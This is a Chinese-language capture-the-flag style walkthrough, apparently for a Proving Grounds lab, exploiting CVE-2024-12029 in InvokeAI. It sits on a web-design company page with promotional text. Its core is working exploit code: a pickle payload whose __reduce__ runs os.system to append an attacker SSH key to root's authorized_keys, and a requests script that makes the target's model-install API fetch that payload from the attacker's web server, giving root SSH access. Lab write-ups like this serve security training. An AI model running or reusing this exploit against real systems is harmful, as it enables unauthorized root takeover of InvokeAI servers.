成都市网站建设_网站建设公司_Ruby_seo优化
2025/12/29 15:09:56 网站建设 项目流程

InvokeAI_RCE | PG Walkthrough

在谷歌搜索“invokeai_rce”,你会很快找到CVE-2024-12029。事实证明,“huntr”是一个新的AI/ML CVE网站。

huntr - 世界上第一个AI/ML漏洞赏金平台

基本上按照此链接中的POC(概念验证)进行操作。解决这个靶机的关键技巧是找到这个链接。

靶机描述建议创建一个密钥,并使用payload将id_rsa.pub上传到root的授权密钥文件中。

首先使用以下命令创建密钥:
ssh-keygen

复制id_rsa.pub并将其用于ssh.py中的payload。

使用如上链接中POC演示的ssh.py来生成payload。该.ckpt文件将把公钥回显到目标机的root用户的authorized_keys文件中。

import pickleclass Payload:def __reduce__(self):import osreturn (os.system, ('echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA0mDlI9bbgZq0XYTKvG+jo/Q6/By7bxTP6VwRqs3sh1 root@kali" >> /root/.ssh/authorized_keys',))def generate_payload():# 不是 .pklwith open('payload.ckpt', 'wb') as f:pickle.dump(Payload(), f)generate_payload()

payload.ckpt文件所在位置设置一个Web服务器,并在exploit.py中引用它以执行payload(将攻击者的id_rsa.pub密钥粘贴到目标机的root授权密钥文件中)。

import requestsurl = "http://192.168.159.218:9090/api/v2/models/install"
params = {"source": "http://192.168.45.227:8080/payload.ckpt","inplace": "true"
}
response = requests.post(url, params=params, json={})
print(response.text)

确保给id_rsa文件必要的权限(chmod 600 id_rsa),然后使用通过ssh-keygen生成的id_rsa密钥以root身份进行SSH连接。
CSD0tFqvECLokhw9aBeRqlyK5KMpaklojJBUegXcB9J+/111yYeGSJSiNtXQwSVQ0pW+HI2mbOG2VnyH8b7ErlJ21+8esbpf+7cQT5JJbS3PF4agwWGfdflw3pgF9XrX
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询